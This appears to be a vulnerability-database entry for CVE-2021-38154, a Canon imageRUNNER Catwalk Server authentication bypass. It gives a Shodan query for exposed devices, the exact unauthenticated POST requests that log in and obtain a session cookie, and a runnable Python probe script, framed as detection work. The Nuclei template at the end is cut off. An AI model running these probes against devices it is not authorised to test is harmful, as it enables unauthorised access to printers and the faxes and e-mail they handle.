CVE-2021-38154
Published: 2021-08-29
Priority: P2 · 75 · High · 7.5 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 4.00% (89.2th percentile)
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Detection & IOCs
- Shodan query title:"imageRUNNER" lists internet-exposed Canon imageRUNNER web interfaces. A hit shows that the device's HTTP interface is reachable; it does not by itself confirm that Catwalk Server is enabled for HTTP or that General User Mode has no PIN, so each hit still needs the login check below.
- Login check, primary path: an unauthenticated POST to /tryLogin.cgi with body loginM=&0000=0011&0002= returns HTTP 303 redirecting to /portal_top.html and sets a fusion-http-session-id cookie. That response indicates a successful login without credentials.
- Login check, alternate path: an unauthenticated POST to /checkLogin.cgi with body i0017=2&i0019= returns HTTP 302 redirecting to /portal_top.html and sets a sessid cookie, again indicating unauthenticated login.
- Preconditions: the device is a Canon model manufactured 2012 through 2020, Catwalk Server is enabled for HTTP access, and no PIN is configured for General User Mode. Devices with a PIN set are not affected by this unauthenticated bypass; devices with Catwalk Server disabled or restricted to HTTPS only may not be vulnerable.
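The two login indicators above, turned into a runnable check. This is an added example; it is not code from this page, from Canon, or from the Nuclei or VulnCheck projects. The paths, request bodies, expected status codes, redirect target and cookie names are the IOC values listed above; the host/port/timeout handling, the constructed SAMPLE_RESPONSES fixture and all function names are this example's own assumptions.

```python
"""Offline-testable checker for the two CVE-2021-38154 login indicators.

Added example; not code from the page, from Canon, or from the Nuclei/VulnCheck
projects. Paths, bodies, status codes, redirect target and cookie names are the
IOC values listed on the page. Host/port/timeout handling, the SAMPLE_RESPONSES
fixture and all function names are this example's own assumptions.
"""
import http.client
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple

REDIRECT_TARGET = "/portal_top.html"

# (path, form body, expected redirect status, session cookie name), from the IOC list.
PROBES = (
    ("/tryLogin.cgi", "loginM=&0000=0011&0002=", 303, "fusion-http-session-id"),
    ("/checkLogin.cgi", "i0017=2&i0019=", 302, "sessid"),
)


@dataclass
class ProbeResult:
    path: str
    matched: bool
    reason: str
    session_cookie: Optional[str] = None


def classify_response(path: str, status: int,
                      headers: Iterable[Tuple[str, str]]) -> ProbeResult:
    """Match one (status, headers) pair against the indicator for `path`.

    All three conditions must hold: the expected 30x status, a Location header
    ending in /portal_top.html, and a Set-Cookie for the expected session cookie.
    A bare redirect (no cookie) or a cookie without the redirect is not a match.
    """
    spec = next((p for p in PROBES if p[0] == path), None)
    if spec is None:
        raise ValueError(f"no indicator defined for {path}")
    _, _, want_status, cookie_name = spec
    hdrs = [(k.lower(), v) for k, v in headers]

    if status != want_status:
        return ProbeResult(path, False, f"status {status}, expected {want_status}")
    location = next((v for k, v in hdrs if k == "location"), "")
    if not location.endswith(REDIRECT_TARGET):
        return ProbeResult(path, False, f"redirect to {location!r}, not {REDIRECT_TARGET}")
    for k, v in hdrs:
        if k != "set-cookie":
            continue
        name, _, value = v.split(";", 1)[0].partition("=")
        if name.strip() == cookie_name:
            return ProbeResult(path, True, "redirect + session cookie", value.strip())
    return ProbeResult(path, False, f"no {cookie_name} cookie set")


def probe_device(host: str, port: int = 80, timeout: float = 5.0) -> list:
    """Send both probes over plain HTTP and classify each answer.

    http.client does not follow redirects, which is what we need: the 302/303
    itself is the indicator. Only use against devices you are authorised to test.
    """
    results = []
    for path, body, _, _ in PROBES:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("POST", path, body=body,
                         headers={"Content-Type": "application/x-www-form-urlencoded"})
            resp = conn.getresponse()
            results.append(classify_response(path, resp.status, resp.getheaders()))
        except OSError as exc:  # refused, timeout, reset: report rather than abort
            results.append(ProbeResult(path, False, f"connection error: {exc}"))
        finally:
            conn.close()
    return results


# Constructed responses (not captured from a real device) so the checker runs offline.
SAMPLE_RESPONSES = {
    "vulnerable": ("/tryLogin.cgi", 303,
                   [("Location", "http://192.0.2.10/portal_top.html"),
                    ("Set-Cookie", "fusion-http-session-id=0a1b2c3d; Path=/; HttpOnly")]),
    "no_redirect": ("/tryLogin.cgi", 200,
                    [("Content-Type", "text/html")]),
    "redirect_only": ("/checkLogin.cgi", 302,
                      [("Location", "/portal_top.html")]),
}


def demo() -> dict:
    """Classify the constructed samples; returns {label: matched}."""
    return {label: classify_response(*resp).matched
            for label, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for r in probe_device(sys.argv[1]):
            print(f"{r.path}: {'INDICATOR MATCH' if r.matched else 'no match'} ({r.reason})")
    else:
        print(demo())
```

Run it with a host argument to probe a device, or with no argument to classify the constructed samples. The checker deliberately uses http.client rather than a redirect-following client: the 302/303 response is the evidence, and a client that silently follows it would land on /portal_top.html and hide the status code. A redirect without the session cookie, or the cookie without the redirect to /portal_top.html, is reported as a non-match so that a plain login-page redirect is not mistaken for the bypass.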
CVSS provenance
- NVD v3.1: 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
- NVD v2.0: 4.3 MEDIUM (AV:N/AC:M/Au:N/C:P/I:N/A:N)
- VulnCheck: 7.5 HIGH
GHSA
GHSA-53fm-fvpg-f4cc (unreviewed, 2022-05-24): CVE-2021-38154, HIGH, CWE-732. The advisory text is the NVD description quoted above.
VulnCheck
canon - Incorrect Permission Assignment for Critical Resource (2021, CVSS 7.5, HIGH). The description is the NVD text quoted above.
Affected: canon -
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwal
No detection rules found.
Nuclei
Canon Devices - Authentication Bypass in Catwalk Server (CVE-2021-38154, HIGH, CVSS 7.5, author daffainfo). The description is the NVD text quoted above.
Template:
id: CVE-2021-38154
info:
  name: Canon Devices - Authentication Bypass in Catwalk Server
  author: daffainfo
  severity: high
  description: |
    Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is
No writeups or analysis indexed.